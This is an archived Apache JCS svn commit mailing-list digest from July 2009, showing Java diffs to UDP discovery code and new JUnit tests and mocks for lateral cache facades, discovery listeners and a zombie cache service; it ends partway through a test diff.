jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java Wed Jul 22 21:13:38 2009 @@ -68,9 +68,9 @@ { try { - if ( log.isInfoEnabled() ) + if ( log.isDebugEnabled() ) { - log.info( "Constructing socket for sender." ); + log.debug( "Constructing socket for sender on port [" + port + "]" ); } localSocket = new MulticastSocket( port ); Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java?rev=796882&r1=796881&r2=796882&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java Wed Jul 22 21:13:38 2009 @@ -116,8 +116,6 @@ + getUdpDiscoveryAttributes().getUdpDiscoveryPort() + "] we won't be able to find any other caches", e ); } - // todo only do the passive if receive is enabled, perhaps set the - // myhost to null or something on the request if ( senderDaemon == null ) { senderDaemon = new ClockDaemon(); @@ -125,16 +123,15 @@ } // create a sender thread - sender = new UDPDiscoverySenderThread( getUdpDiscoveryAttributes(), this.getCacheNames() ); - - senderDaemon.executePeriodically( 30 * 1000, sender, false ); + sender = new UDPDiscoverySenderThread( getUdpDiscoveryAttributes(), getCacheNames() ); + senderDaemon.executePeriodically( 15 * 1000, sender, true ); // add the cleanup daemon too cleanup = new UDPCleanupRunner( this ); // I'm going to use this as both, but it could happen - // that something could hang around twice the time suing this as the + // that something could hang around twice the time using this as the // delay and the idle time. - senderDaemon.executePeriodically( this.getUdpDiscoveryAttributes().getMaxIdleTimeSec() * 1000, cleanup, false ); + senderDaemon.executePeriodically( getUdpDiscoveryAttributes().getMaxIdleTimeSec() * 1000, cleanup, false ); // add shutdown hook that will issue a remove call. DiscoveryShutdownHook shutdownHook = new DiscoveryShutdownHook( this ); @@ -208,7 +205,15 @@ */ public void removeDiscoveredService( DiscoveredService service ) { - getDiscoveredServices().remove( service ); + boolean contained = getDiscoveredServices().remove( service ); + + if ( contained ) + { + if ( log.isInfoEnabled() ) + { + log.info( "Removing " + service ); + } + } Iterator it = getDiscoveryListeners().iterator(); while ( it.hasNext() ) Added: jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacadeUnitTest.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacadeUnitTest.java?rev=796882&view=auto ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacadeUnitTest.java (added) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacadeUnitTest.java Wed Jul 22 21:13:38 2009 @@ -0,0 +1,121 @@ +package org.apache.jcs.auxiliary.lateral; + +import org.apache.jcs.auxiliary.lateral.behavior.ILateralCacheAttributes; + +import junit.framework.TestCase; + +/** + * Tests for LateralCacheNoWaitFacade. + */ +public class LateralCacheNoWaitFacadeUnitTest + extends TestCase +{ + /** + * Verify that we can remove an item. + */ + public void testAddThenRemoveNoWait_InList() + { + // SETUP + LateralCacheNoWait[] noWaits = new LateralCacheNoWait[0]; + ILateralCacheAttributes cattr = new LateralCacheAttributes(); + cattr.setCacheName( "testCache1" ); + + LateralCacheNoWaitFacade facade = new LateralCacheNoWaitFacade( noWaits, cattr ); + + LateralCache cache = new LateralCache( cattr ); + LateralCacheNoWait noWait = new LateralCacheNoWait( cache ); + + // DO WORK + facade.addNoWait( noWait ); + + // VERIFY + assertTrue( "Should be in the list.", facade.containsNoWait( noWait ) ); + + // DO WORK + facade.removeNoWait( noWait ); + + // VERIFY + assertEquals( "Should have 0", 0, facade.noWaits.length ); + assertFalse( "Should not be in the list. ", facade.containsNoWait( noWait ) ); + } + + /** + * Verify that we can remove an item. + */ + public void testAddThenRemoveNoWait_InListSize2() + { + // SETUP + LateralCacheNoWait[] noWaits = new LateralCacheNoWait[0]; + ILateralCacheAttributes cattr = new LateralCacheAttributes(); + cattr.setCacheName( "testCache1" ); + + LateralCacheNoWaitFacade facade = new LateralCacheNoWaitFacade( noWaits, cattr ); + + LateralCache cache = new LateralCache( cattr ); + LateralCacheNoWait noWait = new LateralCacheNoWait( cache ); + LateralCacheNoWait noWait2 = new LateralCacheNoWait( cache ); + + // DO WORK + facade.addNoWait( noWait ); + facade.addNoWait( noWait2 ); + + // VERIFY + assertEquals( "Should have 2", 2, facade.noWaits.length ); + assertTrue( "Should be in the list.", facade.containsNoWait( noWait ) ); + assertTrue( "Should be in the list.", facade.containsNoWait( noWait2 ) ); + + // DO WORK + facade.removeNoWait( noWait ); + + // VERIFY + assertEquals( "Should only have 1", 1, facade.noWaits.length ); + assertFalse( "Should not be in the list. ", facade.containsNoWait( noWait ) ); + assertTrue( "Should be in the list.", facade.containsNoWait( noWait2 ) ); + } + + /** + * Verify that we can remove an item. + */ + public void testAdd_InList() + { + // SETUP + LateralCacheNoWait[] noWaits = new LateralCacheNoWait[0]; + ILateralCacheAttributes cattr = new LateralCacheAttributes(); + cattr.setCacheName( "testCache1" ); + + LateralCacheNoWaitFacade facade = new LateralCacheNoWaitFacade( noWaits, cattr ); + + LateralCache cache = new LateralCache( cattr ); + LateralCacheNoWait noWait = new LateralCacheNoWait( cache ); + + // DO WORK + facade.addNoWait( noWait ); + facade.addNoWait( noWait ); + + // VERIFY + assertTrue( "Should be in the list.", facade.containsNoWait( noWait ) ); + assertEquals( "Should only have 1", 1, facade.noWaits.length ); + } + + /** + * Verify that we can remove an item. + */ + public void testAddThenRemoveNoWait_NotInList() + { + // SETUP + LateralCacheNoWait[] noWaits = new LateralCacheNoWait[0]; + ILateralCacheAttributes cattr = new LateralCacheAttributes(); + cattr.setCacheName( "testCache1" ); + + LateralCacheNoWaitFacade facade = new LateralCacheNoWaitFacade( noWaits, cattr ); + + LateralCache cache = new LateralCache( cattr ); + LateralCacheNoWait noWait = new LateralCacheNoWait( cache ); + + // DO WORK + facade.removeNoWait( noWait ); + + // VERIFY + assertFalse( "Should not be in the list.", facade.containsNoWait( noWait ) ); + } +} --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 23 18:27:02 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96315 invoked from network); 23 Jul 2009 18:27:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jul 2009 18:27:02 -0000 Received: (qmail 35115 invoked by uid 500); 23 Jul 2009 18:28:07 -0000 Delivered-To: [email protected] Received: (qmail 35062 invoked by uid 500); 23 Jul 2009 18:28:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 35052 invoked by uid 500); 23 Jul 2009 18:28:07 -0000 Delivered-To: [email protected] Received: (qmail 35049 invoked by uid 500); 23 Jul 2009 18:28:07 -0000 Delivered-To: [email protected] Received: (qmail 35046 invoked by uid 99); 23 Jul 2009 18:28:07 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 18:28:07 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Jul 2009 18:28:04 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 211B723888D3; Thu, 23 Jul 2009 18:27:44 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r797178 [2/2] - in /jakarta/jcs/trunk/src: conf/ java/org/apache/jcs/auxiliary/lateral/ java/org/apache/jcs/auxiliary/lateral/behavior/ java/org/apache/jcs/auxiliary/lateral/socket/tcp/ java/org/apache/jcs/auxiliary/lateral/socket/tcp/behav... Date: Thu, 23 Jul 2009 18:27:42 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Added: jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerUnitTest.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerUnitTest.java?rev=797178&view=auto ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerUnitTest.java (added) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListenerUnitTest.java Thu Jul 23 18:27:41 2009 @@ -0,0 +1,255 @@ +package org.apache.jcs.auxiliary.lateral.socket.tcp; + +import java.util.ArrayList; + +import junit.framework.TestCase; + +import org.apache.jcs.auxiliary.lateral.LateralCache; +import org.apache.jcs.auxiliary.lateral.LateralCacheAttributes; +import org.apache.jcs.auxiliary.lateral.LateralCacheNoWait; +import org.apache.jcs.auxiliary.lateral.LateralCacheNoWaitFacade; +import org.apache.jcs.auxiliary.lateral.behavior.ILateralCacheAttributes; +import org.apache.jcs.auxiliary.lateral.socket.tcp.behavior.ITCPLateralCacheAttributes; +import org.apache.jcs.engine.behavior.ICompositeCacheManager; +import org.apache.jcs.engine.behavior.IElementSerializer; +import org.apache.jcs.engine.control.CompositeCacheManager; +import org.apache.jcs.engine.logging.MockCacheEventLogger; +import org.apache.jcs.utils.discovery.DiscoveredService; +import org.apache.jcs.utils.serialization.StandardSerializer; + +/** Test for the listener that observers UDP discovery events. */ +public class LateralTCPDiscoveryListenerUnitTest + extends TestCase +{ + /** the listener */ + private LateralTCPDiscoveryListener listener; + + /** The cache manager. */ + private ICompositeCacheManager cacheMgr; + + /** The event logger. */ + protected MockCacheEventLogger cacheEventLogger; + + /** The serializer. */ + protected IElementSerializer elementSerializer; + + /** Create the listener for testing */ + protected void setUp() + { + cacheMgr = CompositeCacheManager.getInstance(); + cacheEventLogger = new MockCacheEventLogger(); + elementSerializer = new StandardSerializer(); + + listener = new LateralTCPDiscoveryListener( cacheMgr, cacheEventLogger, elementSerializer ); + } + + /** + * Add a no wait facade. + */ + public void testAddNoWaitFacade_NotInList() + { + // SETUP + String cacheName = "testAddNoWaitFacade_NotInList"; + LateralCacheNoWait[] noWaits = new LateralCacheNoWait[0]; + ILateralCacheAttributes cattr = new LateralCacheAttributes(); + cattr.setCacheName( cacheName ); + + LateralCacheNoWaitFacade facade = new LateralCacheNoWaitFacade( noWaits, cattr ); + + // DO WORK + listener.addNoWaitFacade( cacheName, facade ); + + // VERIFY + assertTrue( "Should have the facade.", listener.containsNoWaitFacade( cacheName ) ); + } + + /** + * Add a no wait to a known facade. + */ + public void testAddNoWait_FacadeInList() + { + // SETUP + String cacheName = "testAddNoWaitFacade_FacadeInList"; + LateralCacheNoWait[] noWaits = new LateralCacheNoWait[0]; + ILateralCacheAttributes cattr = new LateralCacheAttributes(); + cattr.setCacheName( cacheName ); + + LateralCacheNoWaitFacade facade = new LateralCacheNoWaitFacade( noWaits, cattr ); + listener.addNoWaitFacade( cacheName, facade ); + + LateralCache cache = new LateralCache( cattr ); + LateralCacheNoWait noWait = new LateralCacheNoWait( cache ); + + // DO WORK + boolean result = listener.addNoWait( noWait ); + + // VERIFY + assertTrue( "Should have added the no wait.", result ); + } + + /** + * Add a no wait from an unknown facade. + */ + public void testAddNoWait_FacadeNotInList() + { + // SETUP + String cacheName = "testAddNoWaitFacade_FacadeInList"; + ILateralCacheAttributes cattr = new LateralCacheAttributes(); + cattr.setCacheName( cacheName ); + + LateralCache cache = new LateralCache( cattr ); + LateralCacheNoWait noWait = new LateralCacheNoWait( cache ); + + // DO WORK + boolean result = listener.addNoWait( noWait ); + + // VERIFY + assertFalse( "Should not have added the no wait.", result ); + } + + /** + * Remove a no wait from an unknown facade. + */ + public void testRemoveNoWait_FacadeNotInList() + { + // SETUP + String cacheName = "testRemoveNoWaitFacade_FacadeNotInList"; + ILateralCacheAttributes cattr = new LateralCacheAttributes(); + cattr.setCacheName( cacheName ); + + LateralCache cache = new LateralCache( cattr ); + LateralCacheNoWait noWait = new LateralCacheNoWait( cache ); + + // DO WORK + boolean result = listener.removeNoWait( noWait ); + + // VERIFY + assertFalse( "Should not have removed the no wait.", result ); + } + + /** + * Remove a no wait from a known facade. + */ + public void testRemoveNoWait_FacadeInList_NoWaitNot() + { + // SETUP + String cacheName = "testAddNoWaitFacade_FacadeInList"; + LateralCacheNoWait[] noWaits = new LateralCacheNoWait[0]; + ILateralCacheAttributes cattr = new LateralCacheAttributes(); + cattr.setCacheName( cacheName ); + + LateralCacheNoWaitFacade facade = new LateralCacheNoWaitFacade( noWaits, cattr ); + listener.addNoWaitFacade( cacheName, facade ); + + LateralCache cache = new LateralCache( cattr ); + LateralCacheNoWait noWait = new LateralCacheNoWait( cache ); + + // DO WORK + boolean result = listener.removeNoWait( noWait ); + + // VERIFY + assertFalse( "Should not have removed the no wait.", result ); + } + + /** + * Remove a no wait from a known facade. + */ + public void testRemoveNoWait_FacadeInList_NoWaitIs() + { + // SETUP + String cacheName = "testRemoveNoWaitFacade_FacadeInListNoWaitIs"; + LateralCacheNoWait[] noWaits = new LateralCacheNoWait[0]; + ILateralCacheAttributes cattr = new LateralCacheAttributes(); + cattr.setCacheName( cacheName ); + + LateralCacheNoWaitFacade facade = new LateralCacheNoWaitFacade( noWaits, cattr ); + listener.addNoWaitFacade( cacheName, facade ); + + LateralCache cache = new LateralCache( cattr ); + LateralCacheNoWait noWait = new LateralCacheNoWait( cache ); + listener.addNoWait( noWait ); + + // DO WORK + boolean result = listener.removeNoWait( noWait ); + + // VERIFY + assertTrue( "Should have removed the no wait.", result ); + } + + /** + * Add a no wait to a known facade. + */ + public void testAddDiscoveredService_FacadeInList_NoWaitNot() + { + // SETUP + String cacheName = "testAddDiscoveredService_FacadeInList_NoWaitNot"; + + ArrayList cacheNames = new ArrayList(); + cacheNames.add( cacheName ); + + DiscoveredService service = new DiscoveredService(); + service.setCacheNames( cacheNames ); + service.setServiceAddress( "localhost" ); + service.setServicePort( 9999 ); + + // since the no waits are compared by object equality, I have to do this + // TODO add an equals method to the noWait. the problem if is figuring out what to compare. + ITCPLateralCacheAttributes lca = new TCPLateralCacheAttributes(); + lca.setTransmissionType( LateralCacheAttributes.TCP ); + lca.setTcpServer( service.getServiceAddress() + ":" + service.getServicePort() ); + LateralTCPCacheManager lcm = LateralTCPCacheManager.getInstance( lca, cacheMgr, cacheEventLogger, + elementSerializer ); + LateralCacheNoWait noWait = (LateralCacheNoWait) lcm.getCache( cacheName ); + + LateralCacheNoWait[] noWaits = new LateralCacheNoWait[0]; + ILateralCacheAttributes cattr = new LateralCacheAttributes(); + cattr.setCacheName( cacheName ); + LateralCacheNoWaitFacade facade = new LateralCacheNoWaitFacade( noWaits, cattr ); + listener.addNoWaitFacade( cacheName, facade ); + + // DO WORK + listener.addDiscoveredService( service ); + + // VERIFY + assertTrue( "Should have no wait.", listener.containsNoWait( cacheName, noWait ) ); + } + + /** + * Remove a no wait from a known facade. + */ + public void testRemoveDiscoveredService_FacadeInList_NoWaitIs() + { + // SETUP + String cacheName = "testRemoveDiscoveredService_FacadeInList_NoWaitIs"; + + ArrayList cacheNames = new ArrayList(); + cacheNames.add( cacheName ); + + DiscoveredService service = new DiscoveredService(); + service.setCacheNames( cacheNames ); + service.setServiceAddress( "localhost" ); + service.setServicePort( 9999 ); + + // since the no waits are compared by object equality, I have to do this + // TODO add an equals method to the noWait. the problem if is figuring out what to compare. + ITCPLateralCacheAttributes lca = new TCPLateralCacheAttributes(); + lca.setTransmissionType( LateralCacheAttributes.TCP ); + lca.setTcpServer( service.getServiceAddress() + ":" + service.getServicePort() ); + LateralTCPCacheManager lcm = LateralTCPCacheManager.getInstance( lca, cacheMgr, cacheEventLogger, + elementSerializer ); + LateralCacheNoWait noWait = (LateralCacheNoWait) lcm.getCache( cacheName ); + + LateralCacheNoWait[] noWaits = new LateralCacheNoWait[0]; + ILateralCacheAttributes cattr = new LateralCacheAttributes(); + cattr.setCacheName( cacheName ); + LateralCacheNoWaitFacade facade = new LateralCacheNoWaitFacade( noWaits, cattr ); + listener.addNoWaitFacade( cacheName, facade ); + listener.addDiscoveredService( service ); + + // DO WORK + listener.removeDiscoveredService( service ); + + // VERIFY + assertFalse( "Should not have no wait.", listener.containsNoWait( cacheName, noWait ) ); + } +} Modified: jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPFilterRemoveHashCodeUnitTest.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPFilterRemoveHashCodeUnitTest.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPFilterRemoveHashCodeUnitTest.java (original) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPFilterRemoveHashCodeUnitTest.java Thu Jul 23 18:27:41 2009 @@ -38,7 +38,7 @@ //private static boolean isSysOut = false; /** The port the server will listen to. */ - private int serverPort = 1118; + private int serverPort = 2001; /** * Constructor for the TestDiskCache object. @@ -56,7 +56,6 @@ public void setUp() { System.setProperty( "jcs.auxiliary.LTCP.attributes.TcpServers", "localhost:" + serverPort ); - JCS.setConfigFilename( "/TestTCPLateralRemoveFilter.ccf" ); } @@ -85,9 +84,6 @@ public void runTestForRegion( String region, int numOps, int testNum ) throws Exception { - - //boolean show = true;//false; - JCS cache = JCS.getInstance( region ); Thread.sleep( 100 ); @@ -95,7 +91,7 @@ TCPLateralCacheAttributes lattr2 = new TCPLateralCacheAttributes(); lattr2.setTcpListenerPort( 1102 ); lattr2.setTransmissionTypeName( "TCP" ); - lattr2.setTcpServer( "localhost:1118" ); + lattr2.setTcpServer( "localhost:" + serverPort ); lattr2.setIssueRemoveOnPut( true ); // should still try to remove lattr2.setAllowPut( false ); Added: jakarta/jcs/trunk/src/test/org/apache/jcs/engine/MockCacheServiceNonLocal.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/engine/MockCacheServiceNonLocal.java?rev=797178&view=auto ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/engine/MockCacheServiceNonLocal.java (added) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/engine/MockCacheServiceNonLocal.java Thu Jul 23 18:27:41 2009 @@ -0,0 +1,232 @@ +package org.apache.jcs.engine; + +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + +import java.io.IOException; +import java.io.Serializable; +import java.util.ArrayList; +import java.util.HashMap; +import java.util.HashSet; +import java.util.List; +import java.util.Map; +import java.util.Set; + +import org.apache.jcs.engine.behavior.ICacheElement; +import org.apache.jcs.engine.behavior.ICacheServiceNonLocal; + +/** + * This is a mock impl of the non local cache service. + */ +public class MockCacheServiceNonLocal + implements ICacheServiceNonLocal +{ + /** The key last passed to get */ + public Serializable lastGetKey; + + /** The pattern last passed to get */ + public String lastGetMatchingPattern; + + /** The keya last passed to getMatching */ + public Set lastGetMultipleKeys; + + /** The object that was last passed to update. */ + public Object lastUpdate; + + /** List of updates. */ + public List updateRequestList = new ArrayList(); + + /** List of request ids. */ + public List updateRequestIdList = new ArrayList(); + + /** The key that was last passed to remove. */ + public Object lastRemoveKey; + + /** The cache name that was last passed to removeAll. */ + public String lastRemoveAllCacheName; + + /** + * @param cacheName + * @param key + * @param requesterId - identity of requester + * @return null + */ + public ICacheElement get( String cacheName, Serializable key, long requesterId ) + { + lastGetKey = key; + return null; + } + + /** + * @param cacheName + * @param groupName + * @return empty set + */ + public Set getGroupKeys( String cacheName, String groupName ) + { + return new HashSet(); + } + + /** + * Set the last remove key. + * <p> + * @param cacheName + * @param key + * @param requesterId - identity of requester + */ + public void remove( String cacheName, Serializable key, long requesterId ) + { + lastRemoveKey = key; + } + + /** + * Set the lastRemoveAllCacheName to the cacheName. + * <p> + * @param cacheName - region name + * @param requesterId - identity of requester + * @throws IOException + */ + public void removeAll( String cacheName, long requesterId ) + throws IOException + { + lastRemoveAllCacheName = cacheName; + } + + /** + * Set the last update item. + * <p> + * @param item + * @param requesterId - identity of requester + */ + public void update( ICacheElement item, long requesterId ) + { + lastUpdate = item; + updateRequestList.add( item ); + updateRequestIdList.add( new Long( requesterId ) ); + } + + /** + * Do nothing. + * <p> + * @param cacheName + */ + public void dispose( String cacheName ) + { + return; + } + + /** + * @param cacheName + * @param key + * @return null + */ + public ICacheElement get( String cacheName, Serializable key ) + { + return get( cacheName, key, 0 ); + } + + /** + * Do nothing. + */ + public void release() + { + return; + } + + /** + * Set the last remove key. + * <p> + * @param cacheName + * @param key + */ + public void remove( String cacheName, Serializable key ) + { + lastRemoveKey = key; + } + + /** + * Set the last remove all cache name. + * <p> + * @param cacheName + */ + public void removeAll( String cacheName ) + { + lastRemoveAllCacheName = cacheName; + } + + /** + * Set the last update item. + * <p> + * @param item + */ + public void update( ICacheElement item ) + { + lastUpdate = item; + } + + /** + * @param cacheName + * @param keys + * @param requesterId - identity of requester + * @return empty map + */ + public Map getMultiple( String cacheName, Set keys, long requesterId ) + { + lastGetMultipleKeys = keys; + return new HashMap(); + } + + /** + * @param cacheName + * @param keys + * @return empty map + */ + public Map getMultiple( String cacheName, Set keys ) + { + return getMultiple( cacheName, keys, 0 ); + } + + /** + * Returns an empty map. Zombies have no internal data. + * <p> + * @param cacheName + * @param pattern + * @return an empty map + * @throws IOException + */ + public Map getMatching( String cacheName, String pattern ) + throws IOException + { + return getMatching( cacheName, pattern, 0 ); + } + + /** + * @param cacheName + * @param pattern + * @param requesterId + * @return Map + * @throws IOException + */ + public Map getMatching( String cacheName, String pattern, long requesterId ) + throws IOException + { + lastGetMatchingPattern = pattern; + return new HashMap(); + } +} Added: jakarta/jcs/trunk/src/test/org/apache/jcs/engine/ZombieCacheServiceNonLocalUnitTest.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/engine/ZombieCacheServiceNonLocalUnitTest.java?rev=797178&view=auto ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/engine/ZombieCacheServiceNonLocalUnitTest.java (added) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/engine/ZombieCacheServiceNonLocalUnitTest.java Thu Jul 23 18:27:41 2009 @@ -0,0 +1,126 @@ +package org.apache.jcs.engine; + +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + +import junit.framework.TestCase; + +import org.apache.jcs.engine.behavior.ICacheElement; + +/** + * Tests for the zombie remote cache service. + */ +public class ZombieCacheServiceNonLocalUnitTest + extends TestCase +{ + /** + * Verify that an update event gets added and then is sent to the service passed to propagate. + * <p> + * @throws Exception + */ + public void testUpdateThenWalk() + throws Exception + { + // SETUP + MockCacheServiceNonLocal service = new MockCacheServiceNonLocal(); + + ZombieCacheServiceNonLocal zombie = new ZombieCacheServiceNonLocal( 10 ); + + String cacheName = "testUpdate"; + + // DO WORK + ICacheElement element = new CacheElement( cacheName, "key", "value" ); + zombie.update( element, 123l ); + zombie.propagateEvents( service ); + + // VERIFY + assertEquals( "Updated element is not as expected.", element, service.lastUpdate ); + } + + /** + * Verify that nothing is added if the max is set to 0. + * <p> + * @throws Exception + */ + public void testUpdateThenWalk_zeroSize() + throws Exception + { + // SETUP + MockCacheServiceNonLocal service = new MockCacheServiceNonLocal(); + + ZombieCacheServiceNonLocal zombie = new ZombieCacheServiceNonLocal( 0 ); + + String cacheName = "testUpdate"; + + // DO WORK + ICacheElement element = new CacheElement( cacheName, "key", "value" ); + zombie.update( element, 123l ); + zombie.propagateEvents( service ); + + // VERIFY + assertNull( "Nothing should have been put to the service.", service.lastUpdate ); + } + + /** + * Verify that a remove event gets added and then is sent to the service passed to propagate. + * <p> + * @throws Exception + */ + public void testRemoveThenWalk() + throws Exception + { + // SETUP + MockCacheServiceNonLocal service = new MockCacheServiceNonLocal(); + + ZombieCacheServiceNonLocal zombie = new ZombieCacheServiceNonLocal( 10 ); + + String cacheName = "testRemoveThenWalk"; + String key = "myKey"; + + // DO WORK + zombie.remove( cacheName, key, 123l ); + zombie.propagateEvents( service ); + + // VERIFY + assertEquals( "Updated element is not as expected.", key, service.lastRemoveKey ); + } + + /** + * Verify that a removeAll event gets added and then is sent to the service passed to propagate. + * <p> + * @throws Exception + */ + public void testRemoveAllThenWalk() + throws Exception + { + // SETUP + MockCacheServiceNonLocal service = new MockCacheServiceNonLocal(); + + ZombieCacheServiceNonLocal zombie = new ZombieCacheServiceNonLocal( 10 ); + + String cacheName = "testRemoveThenWalk"; + + // DO WORK + zombie.removeAll( cacheName, 123l ); + zombie.propagateEvents( service ); + + // VERIFY + assertEquals( "Updated element is not as expected.", cacheName, service.lastRemoveAllCacheName ); + } +} Modified: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java?rev=797178&r1=797177&r2=797178&view=diff ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java (original) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java Thu Jul 23 18:27:41 2009 @@ -65,7 +65,71 @@ } /** Verify that the list is updated. */ - public void testAddOrUpdateService_InList() + public void testAddOrUpdateService_InList_NamesDoNotChange() + { + // SETUP + String host = "161.129.204.104"; + int port = 6789; + UDPDiscoveryAttributes attributes = new UDPDiscoveryAttributes(); + attributes.setUdpDiscoveryAddr( host ); + attributes.setUdpDiscoveryPort( port ); + attributes.setServicePort( 1000 ); + + // create the service + UDPDiscoveryService service = new UDPDiscoveryService( attributes, new MockCacheEventLogger() ); + service.addParticipatingCacheName( "testCache1" ); + + MockDiscoveryListener discoveryListener = new MockDiscoveryListener(); + service.addDiscoveryListener( discoveryListener ); + + ArrayList sametCacheNames = new ArrayList(); + sametCacheNames.add( "name1" ); + + DiscoveredService discoveredService = new DiscoveredService(); + discoveredService.setServiceAddress( host ); + discoveredService.setCacheNames( sametCacheNames ); + discoveredService.setServicePort( 1000 ); + discoveredService.setLastHearFromTime( 100 ); + + + DiscoveredService discoveredService2 = new DiscoveredService(); + discoveredService2.setServiceAddress( host ); + discoveredService2.setCacheNames( sametCacheNames ); + discoveredService2.setServicePort( 1000 ); + discoveredService2.setLastHearFromTime( 500 ); + + // DO WORK + service.addOrUpdateService( discoveredService ); + // again + service.addOrUpdateService( discoveredService2 ); + + // VERIFY + assertEquals( "Should only be one in the set.", 1, service.getDiscoveredServices().size() ); + assertTrue( "Service should be in the service list.", service.getDiscoveredServices() + .contains( discoveredService ) ); + assertTrue( "Service should be in the listener list.", discoveryListener.discoveredServices + .contains( discoveredService ) ); + + Iterator it = service.getDiscoveredServices().iterator(); + // need to update the time this sucks. add has no effect convert to a map + while ( it.hasNext() ) + { + DiscoveredService service1 = (DiscoveredService) it.next(); + if ( discoveredService.equals( service1 ) ) + { + assertEquals( "The match should have the new last heard from time.", service1.getLastHearFromTime(), + discoveredService2.getLastHearFromTime() ); + } + } + // the mock has a list from all add calls. + // it should have been called when the list changed. + //assertEquals( "Mock should have been called once.", 1, discoveryListener.discoveredServices.size() ); + // logic changed. it's called every time. + assertEquals( "Mock should have been called twice.", 2, discoveryListener.discoveredServices.size() ); + } + + /** Verify that the list is updated. */ + public void testAddOrUpdateService_InList_NamesChange() { // SETUP String host = "161.129.204.104"; @@ -88,9 +152,11 @@ discoveredService.setServicePort( 1000 ); discoveredService.setLastHearFromTime( 100 ); + ArrayList differentCacheNames = new ArrayList(); + differentCacheNames.add( "name1" ); DiscoveredService discoveredService2 = new DiscoveredService(); discoveredService2.setServiceAddress( host ); - discoveredService2.setCacheNames( new ArrayList() ); + discoveredService2.setCacheNames( differentCacheNames ); 